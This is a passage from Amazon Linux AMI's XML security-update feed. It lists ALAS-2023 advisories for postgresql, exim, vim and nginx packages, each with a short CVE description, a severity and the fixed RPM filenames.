arch="x86_64"><filename>Packages/postgresql93-devel-9.3.25-1.73.amzn1.x86_64.rpm</filename></package><package name="postgresql93-libs" version="9.3.25" release="1.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-libs-9.3.25-1.73.amzn1.x86_64.rpm</filename></package><package name="postgresql93-test" version="9.3.25" release="1.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-test-9.3.25-1.73.amzn1.x86_64.rpm</filename></package><package name="postgresql93-libs" version="9.3.25" release="1.73.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-libs-9.3.25-1.73.amzn1.i686.rpm</filename></package><package name="postgresql93-plpython26" version="9.3.25" release="1.73.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-plpython26-9.3.25-1.73.amzn1.i686.rpm</filename></package><package name="postgresql93-debuginfo" version="9.3.25" release="1.73.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-debuginfo-9.3.25-1.73.amzn1.i686.rpm</filename></package><package name="postgresql93-test" version="9.3.25" release="1.73.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-test-9.3.25-1.73.amzn1.i686.rpm</filename></package><package name="postgresql93-pltcl" version="9.3.25" release="1.73.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-pltcl-9.3.25-1.73.amzn1.i686.rpm</filename></package><package name="postgresql93-plpython27" version="9.3.25" release="1.73.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-plpython27-9.3.25-1.73.amzn1.i686.rpm</filename></package><package name="postgresql93-contrib" version="9.3.25" release="1.73.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-contrib-9.3.25-1.73.amzn1.i686.rpm</filename></package><package name="postgresql93-docs" version="9.3.25" release="1.73.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-docs-9.3.25-1.73.amzn1.i686.rpm</filename></package><package name="postgresql93" version="9.3.25" release="1.73.amzn1" 
epoch="0" arch="i686"><filename>Packages/postgresql93-9.3.25-1.73.amzn1.i686.rpm</filename></package><package name="postgresql93-server" version="9.3.25" release="1.73.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-server-9.3.25-1.73.amzn1.i686.rpm</filename></package><package name="postgresql93-plperl" version="9.3.25" release="1.73.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-plperl-9.3.25-1.73.amzn1.i686.rpm</filename></package><package name="postgresql93-devel" version="9.3.25" release="1.73.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-devel-9.3.25-1.73.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1659</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1659: medium priority package update for postgresql94</title><issued date="2023-01-18 20:56:00" /><updated date="2023-01-24 17:23:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-23214:
When the server is configured to use trust authentication with a clientcert requirement or to use cert authentication, a man-in-the-middle attacker can inject arbitrary SQL queries when a connection is first established, despite the use of SSL certificate verification and encryption.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23214" title="" id="CVE-2021-23214" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="postgresql94-plperl" version="9.4.26" release="1.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-plperl-9.4.26-1.78.amzn1.x86_64.rpm</filename></package><package name="postgresql94-libs" version="9.4.26" release="1.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-libs-9.4.26-1.78.amzn1.x86_64.rpm</filename></package><package name="postgresql94" version="9.4.26" release="1.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-9.4.26-1.78.amzn1.x86_64.rpm</filename></package><package name="postgresql94-debuginfo" version="9.4.26" release="1.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-debuginfo-9.4.26-1.78.amzn1.x86_64.rpm</filename></package><package name="postgresql94-plpython26" version="9.4.26" release="1.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-plpython26-9.4.26-1.78.amzn1.x86_64.rpm</filename></package><package name="postgresql94-contrib" version="9.4.26" release="1.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-contrib-9.4.26-1.78.amzn1.x86_64.rpm</filename></package><package name="postgresql94-devel" version="9.4.26" release="1.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-devel-9.4.26-1.78.amzn1.x86_64.rpm</filename></package><package name="postgresql94-plpython27" version="9.4.26" release="1.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-plpython27-9.4.26-1.78.amzn1.x86_64.rpm</filename></package><package name="postgresql94-server" version="9.4.26" release="1.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-server-9.4.26-1.78.amzn1.x86_64.rpm</filename></package><package name="postgresql94-test" version="9.4.26" release="1.78.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/postgresql94-test-9.4.26-1.78.amzn1.x86_64.rpm</filename></package><package name="postgresql94-docs" version="9.4.26" release="1.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-docs-9.4.26-1.78.amzn1.x86_64.rpm</filename></package><package name="postgresql94-plperl" version="9.4.26" release="1.78.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-plperl-9.4.26-1.78.amzn1.i686.rpm</filename></package><package name="postgresql94" version="9.4.26" release="1.78.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-9.4.26-1.78.amzn1.i686.rpm</filename></package><package name="postgresql94-docs" version="9.4.26" release="1.78.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-docs-9.4.26-1.78.amzn1.i686.rpm</filename></package><package name="postgresql94-devel" version="9.4.26" release="1.78.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-devel-9.4.26-1.78.amzn1.i686.rpm</filename></package><package name="postgresql94-plpython26" version="9.4.26" release="1.78.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-plpython26-9.4.26-1.78.amzn1.i686.rpm</filename></package><package name="postgresql94-plpython27" version="9.4.26" release="1.78.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-plpython27-9.4.26-1.78.amzn1.i686.rpm</filename></package><package name="postgresql94-test" version="9.4.26" release="1.78.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-test-9.4.26-1.78.amzn1.i686.rpm</filename></package><package name="postgresql94-contrib" version="9.4.26" release="1.78.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-contrib-9.4.26-1.78.amzn1.i686.rpm</filename></package><package name="postgresql94-server" version="9.4.26" release="1.78.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-server-9.4.26-1.78.amzn1.i686.rpm</filename></package><package name="postgresql94-libs" version="9.4.26" release="1.78.amzn1" epoch="0" 
arch="i686"><filename>Packages/postgresql94-libs-9.4.26-1.78.amzn1.i686.rpm</filename></package><package name="postgresql94-debuginfo" version="9.4.26" release="1.78.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-debuginfo-9.4.26-1.78.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1660</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1660: medium priority package update for postgresql95</title><issued date="2023-01-18 20:56:00" /><updated date="2023-01-24 17:23:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-23214:
When the server is configured to use trust authentication with a clientcert requirement or to use cert authentication, a man-in-the-middle attacker can inject arbitrary SQL queries when a connection is first established, despite the use of SSL certificate verification and encryption.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23214" title="" id="CVE-2021-23214" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="postgresql95-plpython26" version="9.5.24" release="1.83.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-plpython26-9.5.24-1.83.amzn1.x86_64.rpm</filename></package><package name="postgresql95-plpython27" version="9.5.24" release="1.83.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-plpython27-9.5.24-1.83.amzn1.x86_64.rpm</filename></package><package name="postgresql95-test" version="9.5.24" release="1.83.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-test-9.5.24-1.83.amzn1.x86_64.rpm</filename></package><package name="postgresql95-static" version="9.5.24" release="1.83.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-static-9.5.24-1.83.amzn1.x86_64.rpm</filename></package><package name="postgresql95" version="9.5.24" release="1.83.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-9.5.24-1.83.amzn1.x86_64.rpm</filename></package><package name="postgresql95-devel" version="9.5.24" release="1.83.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-devel-9.5.24-1.83.amzn1.x86_64.rpm</filename></package><package name="postgresql95-contrib" version="9.5.24" release="1.83.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-contrib-9.5.24-1.83.amzn1.x86_64.rpm</filename></package><package name="postgresql95-libs" version="9.5.24" release="1.83.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-libs-9.5.24-1.83.amzn1.x86_64.rpm</filename></package><package name="postgresql95-server" version="9.5.24" release="1.83.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-server-9.5.24-1.83.amzn1.x86_64.rpm</filename></package><package name="postgresql95-debuginfo" version="9.5.24" release="1.83.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/postgresql95-debuginfo-9.5.24-1.83.amzn1.x86_64.rpm</filename></package><package name="postgresql95-docs" version="9.5.24" release="1.83.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-docs-9.5.24-1.83.amzn1.x86_64.rpm</filename></package><package name="postgresql95-plperl" version="9.5.24" release="1.83.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-plperl-9.5.24-1.83.amzn1.x86_64.rpm</filename></package><package name="postgresql95-contrib" version="9.5.24" release="1.83.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-contrib-9.5.24-1.83.amzn1.i686.rpm</filename></package><package name="postgresql95-plperl" version="9.5.24" release="1.83.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-plperl-9.5.24-1.83.amzn1.i686.rpm</filename></package><package name="postgresql95-devel" version="9.5.24" release="1.83.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-devel-9.5.24-1.83.amzn1.i686.rpm</filename></package><package name="postgresql95-server" version="9.5.24" release="1.83.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-server-9.5.24-1.83.amzn1.i686.rpm</filename></package><package name="postgresql95-plpython26" version="9.5.24" release="1.83.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-plpython26-9.5.24-1.83.amzn1.i686.rpm</filename></package><package name="postgresql95" version="9.5.24" release="1.83.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-9.5.24-1.83.amzn1.i686.rpm</filename></package><package name="postgresql95-static" version="9.5.24" release="1.83.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-static-9.5.24-1.83.amzn1.i686.rpm</filename></package><package name="postgresql95-test" version="9.5.24" release="1.83.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-test-9.5.24-1.83.amzn1.i686.rpm</filename></package><package name="postgresql95-libs" version="9.5.24" release="1.83.amzn1" 
epoch="0" arch="i686"><filename>Packages/postgresql95-libs-9.5.24-1.83.amzn1.i686.rpm</filename></package><package name="postgresql95-debuginfo" version="9.5.24" release="1.83.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-debuginfo-9.5.24-1.83.amzn1.i686.rpm</filename></package><package name="postgresql95-plpython27" version="9.5.24" release="1.83.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-plpython27-9.5.24-1.83.amzn1.i686.rpm</filename></package><package name="postgresql95-docs" version="9.5.24" release="1.83.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-docs-9.5.24-1.83.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1661</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1661: medium priority package update for postgresql96</title><issued date="2023-01-18 20:56:00" /><updated date="2023-01-24 17:23:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-23214:
When the server is configured to use trust authentication with a clientcert requirement or to use cert authentication, a man-in-the-middle attacker can inject arbitrary SQL queries when a connection is first established, despite the use of SSL certificate verification and encryption.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23214" title="" id="CVE-2021-23214" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="postgresql96-plpython27" version="9.6.24" release="1.86.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-plpython27-9.6.24-1.86.amzn1.x86_64.rpm</filename></package><package name="postgresql96-devel" version="9.6.24" release="1.86.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-devel-9.6.24-1.86.amzn1.x86_64.rpm</filename></package><package name="postgresql96-test" version="9.6.24" release="1.86.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-test-9.6.24-1.86.amzn1.x86_64.rpm</filename></package><package name="postgresql96-debuginfo" version="9.6.24" release="1.86.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-debuginfo-9.6.24-1.86.amzn1.x86_64.rpm</filename></package><package name="postgresql96-contrib" version="9.6.24" release="1.86.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-contrib-9.6.24-1.86.amzn1.x86_64.rpm</filename></package><package name="postgresql96" version="9.6.24" release="1.86.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-9.6.24-1.86.amzn1.x86_64.rpm</filename></package><package name="postgresql96-plperl" version="9.6.24" release="1.86.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-plperl-9.6.24-1.86.amzn1.x86_64.rpm</filename></package><package name="postgresql96-plpython26" version="9.6.24" release="1.86.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-plpython26-9.6.24-1.86.amzn1.x86_64.rpm</filename></package><package name="postgresql96-libs" version="9.6.24" release="1.86.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-libs-9.6.24-1.86.amzn1.x86_64.rpm</filename></package><package name="postgresql96-static" version="9.6.24" release="1.86.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/postgresql96-static-9.6.24-1.86.amzn1.x86_64.rpm</filename></package><package name="postgresql96-docs" version="9.6.24" release="1.86.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-docs-9.6.24-1.86.amzn1.x86_64.rpm</filename></package><package name="postgresql96-server" version="9.6.24" release="1.86.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-server-9.6.24-1.86.amzn1.x86_64.rpm</filename></package><package name="postgresql96-plperl" version="9.6.24" release="1.86.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-plperl-9.6.24-1.86.amzn1.i686.rpm</filename></package><package name="postgresql96-contrib" version="9.6.24" release="1.86.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-contrib-9.6.24-1.86.amzn1.i686.rpm</filename></package><package name="postgresql96-docs" version="9.6.24" release="1.86.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-docs-9.6.24-1.86.amzn1.i686.rpm</filename></package><package name="postgresql96-test" version="9.6.24" release="1.86.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-test-9.6.24-1.86.amzn1.i686.rpm</filename></package><package name="postgresql96-server" version="9.6.24" release="1.86.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-server-9.6.24-1.86.amzn1.i686.rpm</filename></package><package name="postgresql96-devel" version="9.6.24" release="1.86.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-devel-9.6.24-1.86.amzn1.i686.rpm</filename></package><package name="postgresql96-plpython26" version="9.6.24" release="1.86.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-plpython26-9.6.24-1.86.amzn1.i686.rpm</filename></package><package name="postgresql96-static" version="9.6.24" release="1.86.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-static-9.6.24-1.86.amzn1.i686.rpm</filename></package><package name="postgresql96-libs" version="9.6.24" release="1.86.amzn1" 
epoch="0" arch="i686"><filename>Packages/postgresql96-libs-9.6.24-1.86.amzn1.i686.rpm</filename></package><package name="postgresql96-plpython27" version="9.6.24" release="1.86.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-plpython27-9.6.24-1.86.amzn1.i686.rpm</filename></package><package name="postgresql96" version="9.6.24" release="1.86.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-9.6.24-1.86.amzn1.i686.rpm</filename></package><package name="postgresql96-debuginfo" version="9.6.24" release="1.86.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-debuginfo-9.6.24-1.86.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1662</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1662: important priority package update for exim</title><issued date="2023-01-18 20:56:00" /><updated date="2023-01-24 17:23:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-3559:
A vulnerability was found in Exim and classified as problematic. This issue affects some unknown processing of the component Regex Handler. The manipulation leads to use after free. The name of the patch is 4e9ed49f8f12eb331b29bd5b6dc3693c520fddc2. It is recommended to apply a patch to fix this issue. The identifier VDB-211073 was assigned to this vulnerability.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3559" title="" id="CVE-2022-3559" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="exim-mon" version="4.92" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-mon-4.92-1.34.amzn1.x86_64.rpm</filename></package><package name="exim-pgsql" version="4.92" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-pgsql-4.92-1.34.amzn1.x86_64.rpm</filename></package><package name="exim-mysql" version="4.92" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-mysql-4.92-1.34.amzn1.x86_64.rpm</filename></package><package name="exim-greylist" version="4.92" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-greylist-4.92-1.34.amzn1.x86_64.rpm</filename></package><package name="exim" version="4.92" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-4.92-1.34.amzn1.x86_64.rpm</filename></package><package name="exim-debuginfo" version="4.92" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-debuginfo-4.92-1.34.amzn1.x86_64.rpm</filename></package><package name="exim-greylist" version="4.92" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/exim-greylist-4.92-1.34.amzn1.i686.rpm</filename></package><package name="exim-debuginfo" version="4.92" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/exim-debuginfo-4.92-1.34.amzn1.i686.rpm</filename></package><package name="exim-pgsql" version="4.92" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/exim-pgsql-4.92-1.34.amzn1.i686.rpm</filename></package><package name="exim-mysql" version="4.92" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/exim-mysql-4.92-1.34.amzn1.i686.rpm</filename></package><package name="exim-mon" version="4.92" release="1.34.amzn1" epoch="0" 
arch="i686"><filename>Packages/exim-mon-4.92-1.34.amzn1.i686.rpm</filename></package><package name="exim" version="4.92" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/exim-4.92-1.34.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1663</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1663: important priority package update for vim</title><issued date="2023-01-18 20:56:00" /><updated date="2024-02-01 19:33:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-3705:
A vulnerability was found in vim and classified as problematic. Affected by this issue is the function qf_update_buffer of the file quickfix.c of the component autocmd Handler. The manipulation leads to use after free. The attack may be launched remotely. Upgrading to version 9.0.0805 is able to address this issue. The name of the patch is d0fab10ed2a86698937e3c3fed2f10bd9bb5e731. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-212324.
CVE-2022-3591:
Use After Free in GitHub repository vim/vim prior to 9.0.0789.
CVE-2022-3520:
Heap-based Buffer Overflow in GitHub repository vim/vim prior to 9.0.0765.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3520" title="" id="CVE-2022-3520" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3591" title="" id="CVE-2022-3591" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3705" title="" id="CVE-2022-3705" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="vim-debuginfo" version="9.0.828" release="1.1.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-debuginfo-9.0.828-1.1.amzn1.x86_64.rpm</filename></package><package name="vim-data" version="9.0.828" release="1.1.amzn1" epoch="2" arch="noarch"><filename>Packages/vim-data-9.0.828-1.1.amzn1.noarch.rpm</filename></package><package name="vim-minimal" version="9.0.828" release="1.1.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-minimal-9.0.828-1.1.amzn1.x86_64.rpm</filename></package><package name="vim-enhanced" version="9.0.828" release="1.1.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-enhanced-9.0.828-1.1.amzn1.x86_64.rpm</filename></package><package name="vim-filesystem" version="9.0.828" release="1.1.amzn1" epoch="2" arch="noarch"><filename>Packages/vim-filesystem-9.0.828-1.1.amzn1.noarch.rpm</filename></package><package name="vim-common" version="9.0.828" release="1.1.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-common-9.0.828-1.1.amzn1.x86_64.rpm</filename></package><package name="vim-minimal" version="9.0.828" release="1.1.amzn1" epoch="2" arch="i686"><filename>Packages/vim-minimal-9.0.828-1.1.amzn1.i686.rpm</filename></package><package name="vim-common" version="9.0.828" release="1.1.amzn1" epoch="2" arch="i686"><filename>Packages/vim-common-9.0.828-1.1.amzn1.i686.rpm</filename></package><package name="vim-enhanced" version="9.0.828" release="1.1.amzn1" epoch="2" 
arch="i686"><filename>Packages/vim-enhanced-9.0.828-1.1.amzn1.i686.rpm</filename></package><package name="vim-debuginfo" version="9.0.828" release="1.1.amzn1" epoch="2" arch="i686"><filename>Packages/vim-debuginfo-9.0.828-1.1.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1664</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1664: medium priority package update for vim</title><issued date="2023-01-18 20:56:00" /><updated date="2023-01-24 17:23:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-4141:
The target's backtrace indicates that libc has detected a heap error or that the target was executing a heap function when it stopped. This could be due to heap corruption, passing a bad pointer to a heap function such as free(), etc. Since heap errors might include buffer overflows, use-after-free situations, etc. they are generally considered exploitable.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4141" title="" id="CVE-2022-4141" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="vim-minimal" version="9.0.1006" release="1.1.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-minimal-9.0.1006-1.1.amzn1.x86_64.rpm</filename></package><package name="vim-debuginfo" version="9.0.1006" release="1.1.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-debuginfo-9.0.1006-1.1.amzn1.x86_64.rpm</filename></package><package name="vim-enhanced" version="9.0.1006" release="1.1.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-enhanced-9.0.1006-1.1.amzn1.x86_64.rpm</filename></package><package name="vim-filesystem" version="9.0.1006" release="1.1.amzn1" epoch="2" arch="noarch"><filename>Packages/vim-filesystem-9.0.1006-1.1.amzn1.noarch.rpm</filename></package><package name="vim-common" version="9.0.1006" release="1.1.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-common-9.0.1006-1.1.amzn1.x86_64.rpm</filename></package><package name="vim-data" version="9.0.1006" release="1.1.amzn1" epoch="2" arch="noarch"><filename>Packages/vim-data-9.0.1006-1.1.amzn1.noarch.rpm</filename></package><package name="vim-minimal" version="9.0.1006" release="1.1.amzn1" epoch="2" arch="i686"><filename>Packages/vim-minimal-9.0.1006-1.1.amzn1.i686.rpm</filename></package><package name="vim-common" version="9.0.1006" release="1.1.amzn1" epoch="2" arch="i686"><filename>Packages/vim-common-9.0.1006-1.1.amzn1.i686.rpm</filename></package><package name="vim-enhanced" version="9.0.1006" release="1.1.amzn1" epoch="2" arch="i686"><filename>Packages/vim-enhanced-9.0.1006-1.1.amzn1.i686.rpm</filename></package><package name="vim-debuginfo" version="9.0.1006" release="1.1.amzn1" epoch="2" arch="i686"><filename>Packages/vim-debuginfo-9.0.1006-1.1.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" 
version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1665</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1665: medium priority package update for nginx</title><issued date="2023-01-18 20:56:00" /><updated date="2023-01-24 17:23:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-41742:
NGINX Open Source before versions 1.23.2 and 1.22.1, NGINX Open Source Subscription before versions R2 P1 and R1 P1, and NGINX Plus before versions R27 P1 and R26 P1 have a vulnerability in the module ngx_http_mp4_module that might allow a local attacker to cause a worker process crash, or might result in worker process memory disclosure by using a specially crafted audio or video file. The issue affects only NGINX products that are built with the module ngx_http_mp4_module, when the mp4 directive is used in the configuration file. Further, the attack is possible only if an attacker can trigger processing of a specially crafted audio or video file with the module ngx_http_mp4_module.
CVE-2022-41741:
NGINX Open Source before versions 1.23.2 and 1.22.1, NGINX Open Source Subscription before versions R2 P1 and R1 P1, and NGINX Plus before versions R27 P1 and R26 P1 have a vulnerability in the module ngx_http_mp4_module that might allow a local attacker to corrupt NGINX worker memory, resulting in its termination or potential other impact using a specially crafted audio or video file. The issue affects only NGINX products that are built with the ngx_http_mp4_module, when the mp4 directive is used in the configuration file. Further, the attack is possible only if an attacker can trigger processing of a specially crafted audio or video file with the module ngx_http_mp4_module.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41741" title="" id="CVE-2022-41741" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41742" title="" id="CVE-2022-41742" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nginx-all-modules" version="1.18.0" release="1.44.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-all-modules-1.18.0-1.44.amzn1.x86_64.rpm</filename></package><package name="nginx-debuginfo" version="1.18.0" release="1.44.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-debuginfo-1.18.0-1.44.amzn1.x86_64.rpm</filename></package><package name="nginx-mod-stream" version="1.18.0" release="1.44.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-mod-stream-1.18.0-1.44.amzn1.x86_64.rpm</filename></package><package name="nginx-mod-mail" version="1.18.0" release="1.44.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-mod-mail-1.18.0-1.44.amzn1.x86_64.rpm</filename></package><package name="nginx-mod-http-geoip" version="1.18.0" release="1.44.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-mod-http-geoip-1.18.0-1.44.amzn1.x86_64.rpm</filename></package><package name="nginx-mod-http-image-filter" version="1.18.0" release="1.44.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-mod-http-image-filter-1.18.0-1.44.amzn1.x86_64.rpm</filename></package><package name="nginx-mod-http-xslt-filter" version="1.18.0" release="1.44.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-mod-http-xslt-filter-1.18.0-1.44.amzn1.x86_64.rpm</filename></package><package name="nginx-mod-http-perl" version="1.18.0" release="1.44.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-mod-http-perl-1.18.0-1.44.amzn1.x86_64.rpm</filename></package><package name="nginx" version="1.18.0" release="1.44.amzn1" epoch="1" 
